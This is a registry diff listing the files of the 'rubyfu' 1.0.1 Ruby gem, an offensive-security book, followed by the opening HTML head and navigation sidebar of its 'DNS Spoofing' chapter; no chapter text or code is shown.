rubyfu 1.0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +7 -0
- data/README.md +96 -0
- data/Rakefile +1 -0
- data/_book/beginners.html +1299 -0
- data/_book/contribution.html +1350 -0
- data/_book/contributors/Ruby_Loves_Us.jpg +0 -0
- data/_book/contributors/index.html +1294 -0
- data/_book/contributors/todo.html +1293 -0
- data/_book/cover.jpg +0 -0
- data/_book/faqs/index.html +1308 -0
- data/_book/files/module03/dns_spoofing_dns-query.pcap +0 -0
- data/_book/files/module03/dns_spoofing_dns-req_res.pcap.pcapng +0 -0
- data/_book/files/module06/ftp.pcap +0 -0
- data/_book/files/module06/packets.pcap +0 -0
- data/_book/gitbook/app.js +25001 -0
- data/_book/gitbook/fonts/fontawesome/FontAwesome.otf +0 -0
- data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.eot +0 -0
- data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.svg +504 -0
- data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.ttf +0 -0
- data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.woff +0 -0
- data/_book/gitbook/images/apple-touch-icon-precomposed-152.png +0 -0
- data/_book/gitbook/images/favicon.ico +0 -0
- data/_book/gitbook/plugins/gitbook-plugin-addcssjs/README.md +19 -0
- data/_book/gitbook/plugins/gitbook-plugin-addcssjs/index.js +57 -0
- data/_book/gitbook/plugins/gitbook-plugin-addcssjs/package.json +47 -0
- data/_book/gitbook/plugins/gitbook-plugin-anchors/plugin.css +26 -0
- data/_book/gitbook/plugins/gitbook-plugin-book-summary-scroll-position-saver/book-summary-scroll-position-saver.js +30 -0
- data/_book/gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.css +28 -0
- data/_book/gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.js +68 -0
- data/_book/gitbook/plugins/gitbook-plugin-fontsettings/buttons.js +151 -0
- data/_book/gitbook/plugins/gitbook-plugin-fontsettings/website.css +291 -0
- data/_book/gitbook/plugins/gitbook-plugin-highlight/ebook.css +131 -0
- data/_book/gitbook/plugins/gitbook-plugin-highlight/website.css +426 -0
- data/_book/gitbook/plugins/gitbook-plugin-search/lunr.min.js +7 -0
- data/_book/gitbook/plugins/gitbook-plugin-search/search.css +27 -0
- data/_book/gitbook/plugins/gitbook-plugin-search/search.js +135 -0
- data/_book/gitbook/plugins/gitbook-plugin-sharing/buttons.js +93 -0
- data/_book/gitbook/plugins/gitbook-plugin-splitter/splitter.css +22 -0
- data/_book/gitbook/plugins/gitbook-plugin-splitter/splitter.js +122 -0
- data/_book/gitbook/style.css +9 -0
- data/_book/googlec55db2d603c3da8b.html +1 -0
- data/_book/images/module02/Cryptography__wiringdiagram.png +0 -0
- data/_book/images/module02/packaging__ocra1.png +0 -0
- data/_book/images/module03/dns_spoofing_wireshark1.png +0 -0
- data/_book/images/module03/dns_spoofing_wireshark2.png +0 -0
- data/_book/images/module04/webfu__post_form1.png +0 -0
- data/_book/images/module04/webfu__proxy2.png +0 -0
- data/_book/images/module04/webfu__twitterAPI1.png +0 -0
- data/_book/images/module04/webfu__xmlrpc1.png +0 -0
- data/_book/images/module05/msf_template1.png +0 -0
- data/_book/images/module06/win-foren__winreg1.png +0 -0
- data/_book/images/other/Ruby_Loves_Us.jpg +0 -0
- data/_book/images/other/cover.jpg +0 -0
- data/_book/images/other/cover_small.jpg +0 -0
- data/_book/images/other/logo.png +0 -0
- data/_book/images/other/rubyfu.png +0 -0
- data/_book/images/other/rubyfu1.png +0 -0
- data/_book/images/other/rubyfu3.png +0 -0
- data/_book/images/other/rubyfu4.png +0 -0
- data/_book/images/other/rubyfu_.png +0 -0
- data/_book/index.html +1284 -0
- data/_book/module_0x1__basic_ruby_kung_fu/array.html +1297 -0
- data/_book/module_0x1__basic_ruby_kung_fu/conversion.html +1386 -0
- data/_book/module_0x1__basic_ruby_kung_fu/extraction.html +1346 -0
- data/_book/module_0x1__basic_ruby_kung_fu/index.html +1367 -0
- data/_book/module_0x1__basic_ruby_kung_fu/string.html +1451 -0
- data/_book/module_0x2__system_kung_fu/command_execution.html +1348 -0
- data/_book/module_0x2__system_kung_fu/cryptography.html +1396 -0
- data/_book/module_0x2__system_kung_fu/email.html +1352 -0
- data/_book/module_0x2__system_kung_fu/file_manipulation.html +1371 -0
- data/_book/module_0x2__system_kung_fu/index.html +1557 -0
- data/_book/module_0x2__system_kung_fu/ncatrb.html +1424 -0
- data/_book/module_0x2__system_kung_fu/packaging.md +1 -0
- data/_book/module_0x2__system_kung_fu/packaging__ocra1.png +0 -0
- data/_book/module_0x2__system_kung_fu/parsing_html,_xml,_json.html +1395 -0
- data/_book/module_0x2__system_kung_fu/rce_as_a_service.html +1336 -0
- data/_book/module_0x2__system_kung_fu/smtp_enumeration.html +1308 -0
- data/_book/module_0x2__system_kung_fu/system_shell.html +1299 -0
- data/_book/module_0x2__system_kung_fu/virustotal.html +1318 -0
- data/_book/module_0x3__network_kung_fu/Remote_shell.md +19 -0
- data/_book/module_0x3__network_kung_fu/arp_spoofing.html +1420 -0
- data/_book/module_0x3__network_kung_fu/dns.html +1315 -0
- data/_book/module_0x3__network_kung_fu/dns_bruteforce.md +49 -0
- data/_book/module_0x3__network_kung_fu/dns_enumeration.html +1371 -0
- data/_book/module_0x3__network_kung_fu/dns_spoofing.html +1694 -0
- data/_book/module_0x3__network_kung_fu/dns_spoofing_wireshark2.png +0 -0
- data/_book/module_0x3__network_kung_fu/ftp.html +1287 -0
- data/_book/module_0x3__network_kung_fu/index.html +1392 -0
- data/_book/module_0x3__network_kung_fu/network_scanning.html +1339 -0
- data/_book/module_0x3__network_kung_fu/network_traffic_analysis.html +1356 -0
- data/_book/module_0x3__network_kung_fu/nmap.html +1355 -0
- data/_book/module_0x3__network_kung_fu/oracle_tns_enum1.png +0 -0
- data/_book/module_0x3__network_kung_fu/packet_manipulation.html +1386 -0
- data/_book/module_0x3__network_kung_fu/ruby_socket.html +1553 -0
- data/_book/module_0x3__network_kung_fu/snmp_enumeration.html +1314 -0
- data/_book/module_0x3__network_kung_fu/ssh.html +1461 -0
- data/_book/module_0x3__network_kung_fu/ssid_finder.html +1324 -0
- data/_book/module_0x3__network_kung_fu/tns_enumeration.html +1505 -0
- data/_book/module_0x4__web_kung_fu/browser_manipulation.html +1630 -0
- data/_book/module_0x4__web_kung_fu/databases.html +1531 -0
- data/_book/module_0x4__web_kung_fu/extending_burpsuite.html +1303 -0
- data/_book/module_0x4__web_kung_fu/index.html +1536 -0
- data/_book/module_0x4__web_kung_fu/interacting_with_apis.html +1271 -0
- data/_book/module_0x4__web_kung_fu/ruby2javascript.html +1303 -0
- data/_book/module_0x4__web_kung_fu/sql_injection_scanner.html +1489 -0
- data/_book/module_0x4__web_kung_fu/twitter_api.html +1328 -0
- data/_book/module_0x4__web_kung_fu/web_servcies_and_apis.html +1291 -0
- data/_book/module_0x4__web_kung_fu/web_server_and_proxy.html +1370 -0
- data/_book/module_0x4__web_kung_fu/web_services.html +1394 -0
- data/_book/module_0x4__web_kung_fu/webfu__burp-ext1.png +0 -0
- data/_book/module_0x4__web_kung_fu/webfu__burp-ext2.png +0 -0
- data/_book/module_0x4__web_kung_fu/webfu__burp_setenv1.png +0 -0
- data/_book/module_0x4__web_kung_fu/webfu__proxy2.png +0 -0
- data/_book/module_0x4__web_kung_fu/webfu__twitterAPI1.png +0 -0
- data/_book/module_0x4__web_kung_fu/webfu__xmlrpc1.png +0 -0
- data/_book/module_0x4__web_kung_fu/wordpress_api.html +1543 -0
- data/_book/module_0x5__exploitation_kung_fu/MSF-struct.png +0 -0
- data/_book/module_0x5__exploitation_kung_fu/auxiliary_module.html +1870 -0
- data/_book/module_0x5__exploitation_kung_fu/exploit_module.html +1523 -0
- data/_book/module_0x5__exploitation_kung_fu/extensions.html +1466 -0
- data/_book/module_0x5__exploitation_kung_fu/fuzzer.html +1325 -0
- data/_book/module_0x5__exploitation_kung_fu/index.html +1319 -0
- data/_book/module_0x5__exploitation_kung_fu/metasm.html +1322 -0
- data/_book/module_0x5__exploitation_kung_fu/metasploit.html +1441 -0
- data/_book/module_0x5__exploitation_kung_fu/meterpreter.html +1327 -0
- data/_book/module_0x5__exploitation_kung_fu/meterpreter_scripting.html +1318 -0
- data/_book/module_0x5__exploitation_kung_fu/msf_meter_railgun1.png +0 -0
- data/_book/module_0x5__exploitation_kung_fu/msf_template1.png +0 -0
- data/_book/module_0x5__exploitation_kung_fu/railgun_api_extension.html +1300 -0
- data/_book/module_0x6__forensic/android_forensic.html +1356 -0
- data/_book/module_0x6__forensic/index.html +1332 -0
- data/_book/module_0x6__forensic/parsing_log_files.html +1375 -0
- data/_book/module_0x6__forensic/win-foren__winreg1.png +0 -0
- data/_book/module_0x6__forensic/windows_forensic.html +1289 -0
- data/_book/package.json +5 -0
- data/_book/references/index.html +1338 -0
- data/_book/required_gems.html +1342 -0
- data/_book/rubyfu_.png +0 -0
- data/_book/search_index.json +1 -0
- data/_book/styles/ebook.css +1 -0
- data/_book/styles/epub.css +1 -0
- data/_book/styles/header.js +5 -0
- data/_book/styles/mobi.css +1 -0
- data/_book/styles/pdf.css +1 -0
- data/_book/styles/website.css +41 -0
- data/bin/rubyfu +48 -0
- data/lib/rubyfu.rb +36 -0
- data/lib/rubyfu/browse.rb +35 -0
- data/lib/rubyfu/version.rb +3 -0
- data/lib/rubyfu/webserver.rb +30 -0
- metadata +210 -0
|
@@ -0,0 +1,1694 @@
|
|
|
1
|
+
<!DOCTYPE HTML>
|
|
2
|
+
<html lang="en" >
|
|
3
|
+
|
|
4
|
+
<head>
|
|
5
|
+
|
|
6
|
+
<meta charset="UTF-8">
|
|
7
|
+
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
|
|
8
|
+
<title>DNS Spoofing | RubyFu</title>
|
|
9
|
+
<meta content="text/html; charset=utf-8" http-equiv="Content-Type">
|
|
10
|
+
<meta name="description" content="">
|
|
11
|
+
<meta name="generator" content="GitBook 2.6.2">
|
|
12
|
+
|
|
13
|
+
|
|
14
|
+
<meta name="HandheldFriendly" content="true"/>
|
|
15
|
+
<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
|
|
16
|
+
<meta name="apple-mobile-web-app-capable" content="yes">
|
|
17
|
+
<meta name="apple-mobile-web-app-status-bar-style" content="black">
|
|
18
|
+
<link rel="apple-touch-icon-precomposed" sizes="152x152" href="../gitbook/images/apple-touch-icon-precomposed-152.png">
|
|
19
|
+
<link rel="shortcut icon" href="../gitbook/images/favicon.ico" type="image/x-icon">
|
|
20
|
+
|
|
21
|
+
<link rel="stylesheet" href="../gitbook/style.css">
|
|
22
|
+
|
|
23
|
+
|
|
24
|
+
<link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-anchors/plugin.css">
|
|
25
|
+
|
|
26
|
+
|
|
27
|
+
|
|
28
|
+
<link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-splitter/splitter.css">
|
|
29
|
+
|
|
30
|
+
|
|
31
|
+
|
|
32
|
+
<link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.css">
|
|
33
|
+
|
|
34
|
+
|
|
35
|
+
|
|
36
|
+
<link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-highlight/website.css">
|
|
37
|
+
|
|
38
|
+
|
|
39
|
+
|
|
40
|
+
<link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-search/search.css">
|
|
41
|
+
|
|
42
|
+
|
|
43
|
+
|
|
44
|
+
<link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-fontsettings/website.css">
|
|
45
|
+
|
|
46
|
+
|
|
47
|
+
|
|
48
|
+
<link rel="stylesheet" href="../styles/website.css">
|
|
49
|
+
|
|
50
|
+
|
|
51
|
+
|
|
52
|
+
|
|
53
|
+
|
|
54
|
+
<link rel="next" href="../module_0x4__web_kung_fu/index.html" />
|
|
55
|
+
|
|
56
|
+
|
|
57
|
+
<link rel="prev" href="../module_0x3__network_kung_fu/arp_spoofing.html" />
|
|
58
|
+
|
|
59
|
+
|
|
60
|
+
<script type="text/javascript" src="../styles/header.js"></script>
|
|
61
|
+
</head>
|
|
62
|
+
<body>
|
|
63
|
+
|
|
64
|
+
|
|
65
|
+
<div class="book"
|
|
66
|
+
data-level="3.10.2"
|
|
67
|
+
data-chapter-title="DNS Spoofing"
|
|
68
|
+
data-filepath="module_0x3__network_kung_fu/dns_spoofing.md"
|
|
69
|
+
data-basepath=".."
|
|
70
|
+
data-revision="Wed Jan 27 2016 09:00:51 GMT+0300 (AST)"
|
|
71
|
+
data-innerlanguage="">
|
|
72
|
+
|
|
73
|
+
|
|
74
|
+
<div class="book-summary">
|
|
75
|
+
<nav role="navigation">
|
|
76
|
+
<ul class="summary">
|
|
77
|
+
|
|
78
|
+
|
|
79
|
+
|
|
80
|
+
|
|
81
|
+
|
|
82
|
+
|
|
83
|
+
|
|
84
|
+
|
|
85
|
+
|
|
86
|
+
<li class="chapter " data-level="0" data-path="index.html">
|
|
87
|
+
|
|
88
|
+
|
|
89
|
+
<a href="../index.html">
|
|
90
|
+
|
|
91
|
+
<i class="fa fa-check"></i>
|
|
92
|
+
|
|
93
|
+
Module 0x0 | Introduction
|
|
94
|
+
</a>
|
|
95
|
+
|
|
96
|
+
|
|
97
|
+
<ul class="articles">
|
|
98
|
+
|
|
99
|
+
|
|
100
|
+
<li class="chapter " data-level="0.1" data-path="contribution.html">
|
|
101
|
+
|
|
102
|
+
|
|
103
|
+
<a href="../contribution.html">
|
|
104
|
+
|
|
105
|
+
<i class="fa fa-check"></i>
|
|
106
|
+
|
|
107
|
+
<b>0.1.</b>
|
|
108
|
+
|
|
109
|
+
Contribution
|
|
110
|
+
</a>
|
|
111
|
+
|
|
112
|
+
|
|
113
|
+
</li>
|
|
114
|
+
|
|
115
|
+
<li class="chapter " data-level="0.2" data-path="beginners.html">
|
|
116
|
+
|
|
117
|
+
|
|
118
|
+
<a href="../beginners.html">
|
|
119
|
+
|
|
120
|
+
<i class="fa fa-check"></i>
|
|
121
|
+
|
|
122
|
+
<b>0.2.</b>
|
|
123
|
+
|
|
124
|
+
Beginners
|
|
125
|
+
</a>
|
|
126
|
+
|
|
127
|
+
|
|
128
|
+
</li>
|
|
129
|
+
|
|
130
|
+
<li class="chapter " data-level="0.3" data-path="required_gems.html">
|
|
131
|
+
|
|
132
|
+
|
|
133
|
+
<a href="../required_gems.html">
|
|
134
|
+
|
|
135
|
+
<i class="fa fa-check"></i>
|
|
136
|
+
|
|
137
|
+
<b>0.3.</b>
|
|
138
|
+
|
|
139
|
+
Required Gems
|
|
140
|
+
</a>
|
|
141
|
+
|
|
142
|
+
|
|
143
|
+
</li>
|
|
144
|
+
|
|
145
|
+
|
|
146
|
+
</ul>
|
|
147
|
+
|
|
148
|
+
</li>
|
|
149
|
+
|
|
150
|
+
<li class="chapter " data-level="1" data-path="module_0x1__basic_ruby_kung_fu/index.html">
|
|
151
|
+
|
|
152
|
+
|
|
153
|
+
<a href="../module_0x1__basic_ruby_kung_fu/index.html">
|
|
154
|
+
|
|
155
|
+
<i class="fa fa-check"></i>
|
|
156
|
+
|
|
157
|
+
<b>1.</b>
|
|
158
|
+
|
|
159
|
+
Module 0x1 | Basic Ruby Kung Fu
|
|
160
|
+
</a>
|
|
161
|
+
|
|
162
|
+
|
|
163
|
+
<ul class="articles">
|
|
164
|
+
|
|
165
|
+
|
|
166
|
+
<li class="chapter " data-level="1.1" data-path="module_0x1__basic_ruby_kung_fu/string.html">
|
|
167
|
+
|
|
168
|
+
|
|
169
|
+
<a href="../module_0x1__basic_ruby_kung_fu/string.html">
|
|
170
|
+
|
|
171
|
+
<i class="fa fa-check"></i>
|
|
172
|
+
|
|
173
|
+
<b>1.1.</b>
|
|
174
|
+
|
|
175
|
+
String
|
|
176
|
+
</a>
|
|
177
|
+
|
|
178
|
+
|
|
179
|
+
<ul class="articles">
|
|
180
|
+
|
|
181
|
+
|
|
182
|
+
<li class="chapter " data-level="1.1.1" data-path="module_0x1__basic_ruby_kung_fu/conversion.html">
|
|
183
|
+
|
|
184
|
+
|
|
185
|
+
<a href="../module_0x1__basic_ruby_kung_fu/conversion.html">
|
|
186
|
+
|
|
187
|
+
<i class="fa fa-check"></i>
|
|
188
|
+
|
|
189
|
+
<b>1.1.1.</b>
|
|
190
|
+
|
|
191
|
+
Conversion
|
|
192
|
+
</a>
|
|
193
|
+
|
|
194
|
+
|
|
195
|
+
</li>
|
|
196
|
+
|
|
197
|
+
<li class="chapter " data-level="1.1.2" data-path="module_0x1__basic_ruby_kung_fu/extraction.html">
|
|
198
|
+
|
|
199
|
+
|
|
200
|
+
<a href="../module_0x1__basic_ruby_kung_fu/extraction.html">
|
|
201
|
+
|
|
202
|
+
<i class="fa fa-check"></i>
|
|
203
|
+
|
|
204
|
+
<b>1.1.2.</b>
|
|
205
|
+
|
|
206
|
+
Extraction
|
|
207
|
+
</a>
|
|
208
|
+
|
|
209
|
+
|
|
210
|
+
</li>
|
|
211
|
+
|
|
212
|
+
|
|
213
|
+
</ul>
|
|
214
|
+
|
|
215
|
+
</li>
|
|
216
|
+
|
|
217
|
+
<li class="chapter " data-level="1.2" data-path="module_0x1__basic_ruby_kung_fu/array.html">
|
|
218
|
+
|
|
219
|
+
|
|
220
|
+
<a href="../module_0x1__basic_ruby_kung_fu/array.html">
|
|
221
|
+
|
|
222
|
+
<i class="fa fa-check"></i>
|
|
223
|
+
|
|
224
|
+
<b>1.2.</b>
|
|
225
|
+
|
|
226
|
+
Array
|
|
227
|
+
</a>
|
|
228
|
+
|
|
229
|
+
|
|
230
|
+
</li>
|
|
231
|
+
|
|
232
|
+
|
|
233
|
+
</ul>
|
|
234
|
+
|
|
235
|
+
</li>
|
|
236
|
+
|
|
237
|
+
<li class="chapter " data-level="2" data-path="module_0x2__system_kung_fu/index.html">
|
|
238
|
+
|
|
239
|
+
|
|
240
|
+
<a href="../module_0x2__system_kung_fu/index.html">
|
|
241
|
+
|
|
242
|
+
<i class="fa fa-check"></i>
|
|
243
|
+
|
|
244
|
+
<b>2.</b>
|
|
245
|
+
|
|
246
|
+
Module 0x2 | System Kung Fu
|
|
247
|
+
</a>
|
|
248
|
+
|
|
249
|
+
|
|
250
|
+
<ul class="articles">
|
|
251
|
+
|
|
252
|
+
|
|
253
|
+
<li class="chapter " data-level="2.1" data-path="module_0x2__system_kung_fu/command_execution.html">
|
|
254
|
+
|
|
255
|
+
|
|
256
|
+
<a href="../module_0x2__system_kung_fu/command_execution.html">
|
|
257
|
+
|
|
258
|
+
<i class="fa fa-check"></i>
|
|
259
|
+
|
|
260
|
+
<b>2.1.</b>
|
|
261
|
+
|
|
262
|
+
Command Execution
|
|
263
|
+
</a>
|
|
264
|
+
|
|
265
|
+
|
|
266
|
+
</li>
|
|
267
|
+
|
|
268
|
+
<li class="chapter " data-level="2.2" data-path="module_0x2__system_kung_fu/file_manipulation.html">
|
|
269
|
+
|
|
270
|
+
|
|
271
|
+
<a href="../module_0x2__system_kung_fu/file_manipulation.html">
|
|
272
|
+
|
|
273
|
+
<i class="fa fa-check"></i>
|
|
274
|
+
|
|
275
|
+
<b>2.2.</b>
|
|
276
|
+
|
|
277
|
+
File manipulation
|
|
278
|
+
</a>
|
|
279
|
+
|
|
280
|
+
|
|
281
|
+
<ul class="articles">
|
|
282
|
+
|
|
283
|
+
|
|
284
|
+
<li class="chapter " data-level="2.2.1" data-path="module_0x2__system_kung_fu/parsing_html,_xml,_json.html">
|
|
285
|
+
|
|
286
|
+
|
|
287
|
+
<a href="../module_0x2__system_kung_fu/parsing_html,_xml,_json.html">
|
|
288
|
+
|
|
289
|
+
<i class="fa fa-check"></i>
|
|
290
|
+
|
|
291
|
+
<b>2.2.1.</b>
|
|
292
|
+
|
|
293
|
+
Parsing HTML, XML, JSON
|
|
294
|
+
</a>
|
|
295
|
+
|
|
296
|
+
|
|
297
|
+
</li>
|
|
298
|
+
|
|
299
|
+
|
|
300
|
+
</ul>
|
|
301
|
+
|
|
302
|
+
</li>
|
|
303
|
+
|
|
304
|
+
<li class="chapter " data-level="2.3" data-path="module_0x2__system_kung_fu/cryptography.html">
|
|
305
|
+
|
|
306
|
+
|
|
307
|
+
<a href="../module_0x2__system_kung_fu/cryptography.html">
|
|
308
|
+
|
|
309
|
+
<i class="fa fa-check"></i>
|
|
310
|
+
|
|
311
|
+
<b>2.3.</b>
|
|
312
|
+
|
|
313
|
+
Cryptography
|
|
314
|
+
</a>
|
|
315
|
+
|
|
316
|
+
|
|
317
|
+
</li>
|
|
318
|
+
|
|
319
|
+
<li class="chapter " data-level="2.4" data-path="module_0x2__system_kung_fu/system_shell.html">
|
|
320
|
+
|
|
321
|
+
|
|
322
|
+
<a href="../module_0x2__system_kung_fu/system_shell.html">
|
|
323
|
+
|
|
324
|
+
<i class="fa fa-check"></i>
|
|
325
|
+
|
|
326
|
+
<b>2.4.</b>
|
|
327
|
+
|
|
328
|
+
Remote Shell
|
|
329
|
+
</a>
|
|
330
|
+
|
|
331
|
+
|
|
332
|
+
<ul class="articles">
|
|
333
|
+
|
|
334
|
+
|
|
335
|
+
<li class="chapter " data-level="2.4.1" data-path="module_0x2__system_kung_fu/ncatrb.html">
|
|
336
|
+
|
|
337
|
+
|
|
338
|
+
<a href="../module_0x2__system_kung_fu/ncatrb.html">
|
|
339
|
+
|
|
340
|
+
<i class="fa fa-check"></i>
|
|
341
|
+
|
|
342
|
+
<b>2.4.1.</b>
|
|
343
|
+
|
|
344
|
+
Ncat.rb
|
|
345
|
+
</a>
|
|
346
|
+
|
|
347
|
+
|
|
348
|
+
</li>
|
|
349
|
+
|
|
350
|
+
<li class="chapter " data-level="2.4.2" data-path="module_0x2__system_kung_fu/rce_as_a_service.html">
|
|
351
|
+
|
|
352
|
+
|
|
353
|
+
<a href="../module_0x2__system_kung_fu/rce_as_a_service.html">
|
|
354
|
+
|
|
355
|
+
<i class="fa fa-check"></i>
|
|
356
|
+
|
|
357
|
+
<b>2.4.2.</b>
|
|
358
|
+
|
|
359
|
+
RCE as a Service
|
|
360
|
+
</a>
|
|
361
|
+
|
|
362
|
+
|
|
363
|
+
</li>
|
|
364
|
+
|
|
365
|
+
|
|
366
|
+
</ul>
|
|
367
|
+
|
|
368
|
+
</li>
|
|
369
|
+
|
|
370
|
+
<li class="chapter " data-level="2.5" data-path="module_0x2__system_kung_fu/virustotal.html">
|
|
371
|
+
|
|
372
|
+
|
|
373
|
+
<a href="../module_0x2__system_kung_fu/virustotal.html">
|
|
374
|
+
|
|
375
|
+
<i class="fa fa-check"></i>
|
|
376
|
+
|
|
377
|
+
<b>2.5.</b>
|
|
378
|
+
|
|
379
|
+
VirusTotal
|
|
380
|
+
</a>
|
|
381
|
+
|
|
382
|
+
|
|
383
|
+
</li>
|
|
384
|
+
|
|
385
|
+
|
|
386
|
+
</ul>
|
|
387
|
+
|
|
388
|
+
</li>
|
|
389
|
+
|
|
390
|
+
<li class="chapter " data-level="3" data-path="module_0x3__network_kung_fu/index.html">
|
|
391
|
+
|
|
392
|
+
|
|
393
|
+
<a href="../module_0x3__network_kung_fu/index.html">
|
|
394
|
+
|
|
395
|
+
<i class="fa fa-check"></i>
|
|
396
|
+
|
|
397
|
+
<b>3.</b>
|
|
398
|
+
|
|
399
|
+
Module 0x3 | Network Kung Fu
|
|
400
|
+
</a>
|
|
401
|
+
|
|
402
|
+
|
|
403
|
+
<ul class="articles">
|
|
404
|
+
|
|
405
|
+
|
|
406
|
+
<li class="chapter " data-level="3.1" data-path="module_0x3__network_kung_fu/ruby_socket.html">
|
|
407
|
+
|
|
408
|
+
|
|
409
|
+
<a href="../module_0x3__network_kung_fu/ruby_socket.html">
|
|
410
|
+
|
|
411
|
+
<i class="fa fa-check"></i>
|
|
412
|
+
|
|
413
|
+
<b>3.1.</b>
|
|
414
|
+
|
|
415
|
+
Ruby Socket
|
|
416
|
+
</a>
|
|
417
|
+
|
|
418
|
+
|
|
419
|
+
</li>
|
|
420
|
+
|
|
421
|
+
<li class="chapter " data-level="3.2" data-path="module_0x3__network_kung_fu/ssid_finder.html">
|
|
422
|
+
|
|
423
|
+
|
|
424
|
+
<a href="../module_0x3__network_kung_fu/ssid_finder.html">
|
|
425
|
+
|
|
426
|
+
<i class="fa fa-check"></i>
|
|
427
|
+
|
|
428
|
+
<b>3.2.</b>
|
|
429
|
+
|
|
430
|
+
SSID Finder
|
|
431
|
+
</a>
|
|
432
|
+
|
|
433
|
+
|
|
434
|
+
</li>
|
|
435
|
+
|
|
436
|
+
<li class="chapter " data-level="3.3" data-path="module_0x3__network_kung_fu/ftp.html">
|
|
437
|
+
|
|
438
|
+
|
|
439
|
+
<a href="../module_0x3__network_kung_fu/ftp.html">
|
|
440
|
+
|
|
441
|
+
<i class="fa fa-check"></i>
|
|
442
|
+
|
|
443
|
+
<b>3.3.</b>
|
|
444
|
+
|
|
445
|
+
FTP
|
|
446
|
+
</a>
|
|
447
|
+
|
|
448
|
+
|
|
449
|
+
</li>
|
|
450
|
+
|
|
451
|
+
<li class="chapter " data-level="3.4" data-path="module_0x3__network_kung_fu/ssh.html">
|
|
452
|
+
|
|
453
|
+
|
|
454
|
+
<a href="../module_0x3__network_kung_fu/ssh.html">
|
|
455
|
+
|
|
456
|
+
<i class="fa fa-check"></i>
|
|
457
|
+
|
|
458
|
+
<b>3.4.</b>
|
|
459
|
+
|
|
460
|
+
SSH
|
|
461
|
+
</a>
|
|
462
|
+
|
|
463
|
+
|
|
464
|
+
</li>
|
|
465
|
+
|
|
466
|
+
<li class="chapter " data-level="3.5" data-path="module_0x2__system_kung_fu/email.html">
|
|
467
|
+
|
|
468
|
+
|
|
469
|
+
<a href="../module_0x2__system_kung_fu/email.html">
|
|
470
|
+
|
|
471
|
+
<i class="fa fa-check"></i>
|
|
472
|
+
|
|
473
|
+
<b>3.5.</b>
|
|
474
|
+
|
|
475
|
+
Email
|
|
476
|
+
</a>
|
|
477
|
+
|
|
478
|
+
|
|
479
|
+
<ul class="articles">
|
|
480
|
+
|
|
481
|
+
|
|
482
|
+
<li class="chapter " data-level="3.5.1" data-path="module_0x2__system_kung_fu/smtp_enumeration.html">
|
|
483
|
+
|
|
484
|
+
|
|
485
|
+
<a href="../module_0x2__system_kung_fu/smtp_enumeration.html">
|
|
486
|
+
|
|
487
|
+
<i class="fa fa-check"></i>
|
|
488
|
+
|
|
489
|
+
<b>3.5.1.</b>
|
|
490
|
+
|
|
491
|
+
SMTP Enumeration
|
|
492
|
+
</a>
|
|
493
|
+
|
|
494
|
+
|
|
495
|
+
</li>
|
|
496
|
+
|
|
497
|
+
|
|
498
|
+
</ul>
|
|
499
|
+
|
|
500
|
+
</li>
|
|
501
|
+
|
|
502
|
+
<li class="chapter " data-level="3.6" data-path="module_0x3__network_kung_fu/network_scanning.html">
|
|
503
|
+
|
|
504
|
+
|
|
505
|
+
<a href="../module_0x3__network_kung_fu/network_scanning.html">
|
|
506
|
+
|
|
507
|
+
<i class="fa fa-check"></i>
|
|
508
|
+
|
|
509
|
+
<b>3.6.</b>
|
|
510
|
+
|
|
511
|
+
Network Scanning
|
|
512
|
+
</a>
|
|
513
|
+
|
|
514
|
+
|
|
515
|
+
<ul class="articles">
|
|
516
|
+
|
|
517
|
+
|
|
518
|
+
<li class="chapter " data-level="3.6.1" data-path="module_0x3__network_kung_fu/nmap.html">
|
|
519
|
+
|
|
520
|
+
|
|
521
|
+
<a href="../module_0x3__network_kung_fu/nmap.html">
|
|
522
|
+
|
|
523
|
+
<i class="fa fa-check"></i>
|
|
524
|
+
|
|
525
|
+
<b>3.6.1.</b>
|
|
526
|
+
|
|
527
|
+
Nmap
|
|
528
|
+
</a>
|
|
529
|
+
|
|
530
|
+
|
|
531
|
+
</li>
|
|
532
|
+
|
|
533
|
+
|
|
534
|
+
</ul>
|
|
535
|
+
|
|
536
|
+
</li>
|
|
537
|
+
|
|
538
|
+
<li class="chapter " data-level="3.7" data-path="module_0x3__network_kung_fu/dns.html">
|
|
539
|
+
|
|
540
|
+
|
|
541
|
+
<a href="../module_0x3__network_kung_fu/dns.html">
|
|
542
|
+
|
|
543
|
+
<i class="fa fa-check"></i>
|
|
544
|
+
|
|
545
|
+
<b>3.7.</b>
|
|
546
|
+
|
|
547
|
+
DNS
|
|
548
|
+
</a>
|
|
549
|
+
|
|
550
|
+
|
|
551
|
+
<ul class="articles">
|
|
552
|
+
|
|
553
|
+
|
|
554
|
+
<li class="chapter " data-level="3.7.1" data-path="module_0x3__network_kung_fu/dns_enumeration.html">
|
|
555
|
+
|
|
556
|
+
|
|
557
|
+
<a href="../module_0x3__network_kung_fu/dns_enumeration.html">
|
|
558
|
+
|
|
559
|
+
<i class="fa fa-check"></i>
|
|
560
|
+
|
|
561
|
+
<b>3.7.1.</b>
|
|
562
|
+
|
|
563
|
+
DNS Enumeration
|
|
564
|
+
</a>
|
|
565
|
+
|
|
566
|
+
|
|
567
|
+
</li>
|
|
568
|
+
|
|
569
|
+
|
|
570
|
+
</ul>
|
|
571
|
+
|
|
572
|
+
</li>
|
|
573
|
+
|
|
574
|
+
<li class="chapter " data-level="3.8" data-path="module_0x3__network_kung_fu/snmp_enumeration.html">
|
|
575
|
+
|
|
576
|
+
|
|
577
|
+
<a href="../module_0x3__network_kung_fu/snmp_enumeration.html">
|
|
578
|
+
|
|
579
|
+
<i class="fa fa-check"></i>
|
|
580
|
+
|
|
581
|
+
<b>3.8.</b>
|
|
582
|
+
|
|
583
|
+
SNMP Enumeration
|
|
584
|
+
</a>
|
|
585
|
+
|
